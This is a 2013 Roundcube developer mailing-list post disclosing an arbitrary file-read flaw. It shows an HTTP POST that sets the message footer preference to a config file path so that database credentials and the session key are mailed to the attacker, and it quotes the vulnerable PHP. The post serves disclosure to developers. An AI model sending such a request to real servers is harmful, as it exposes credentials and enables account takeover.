[RCD] zero day vulnerability (tested on v8.0 to 9.0)

Sergey Sidlyarenko roundcube at lefoyer.ru
Wed Mar 27 17:04:38 CET 2013


Hacker first change value in user preference generic_message_footer to 
any file allowed to read roundcube (config/db.inc.php 
config/main.inc.php), after send herself message (with included config 
file). This allow view session crypto key, and db user and password. If 
at hosting installed phpmyadmin (mysql) or pgmyadmin (pgsql) and session 
saved in db, hacker get user mail login and password.


Finded in Russian tech blog (http://habrahabr.ru/post/174423/).

------

POST /?_task=settings&_action=save-pref&check_request=&_check_request= 
HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail" "Mozilla/5.0 
(Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0" 
"_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php


------

index.php:

else if ($RCMAIL->action == 'save-pref') {
  include INSTALL_PATH . 'program/steps/utils/save_pref.inc';
}


------

program/steps/utils/save_pref.inc:

$name = get_input_value('_name', RCUBE_INPUT_POST);
$value = get_input_value('_value', RCUBE_INPUT_POST);

// save preference value
$RCMAIL->user->save_prefs(array($name => $value));                      
//<--------- rewrite value

// update also session if requested
if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) {
     // Support multidimensional arrays...
     $vars = explode('/', $sessname);

     // ... up to 3 levels
     if (count($vars) == 1)
         $_SESSION[$vars[0]] = $value;
     else if (count($vars) == 2)
         $_SESSION[$vars[0]][$vars[1]] = $value;
     else if (count($vars) == 3)
         $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value;
}

$OUTPUT->reset();
$OUTPUT->send();

------

program/steps/mail/sendmail.inc

   // generic footer for all messages
   if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) {
       $footer = 
file_get_contents(realpath($CONFIG['generic_message_footer_html']));     
    //<----- load file from value path
       $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, 
$message_charset);
   }
   else if (!empty($CONFIG['generic_message_footer'])) {
     $footer = 
file_get_contents(realpath($CONFIG['generic_message_footer']));          
      //<----- load file from value path
     $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, 
$message_charset);
     if ($isHtml)
       $footer = '<pre>'.$footer.'</pre>';
   }


-- 
Sidlyarenko Sergey
https://github.com/lefoyer


More information about the dev mailing list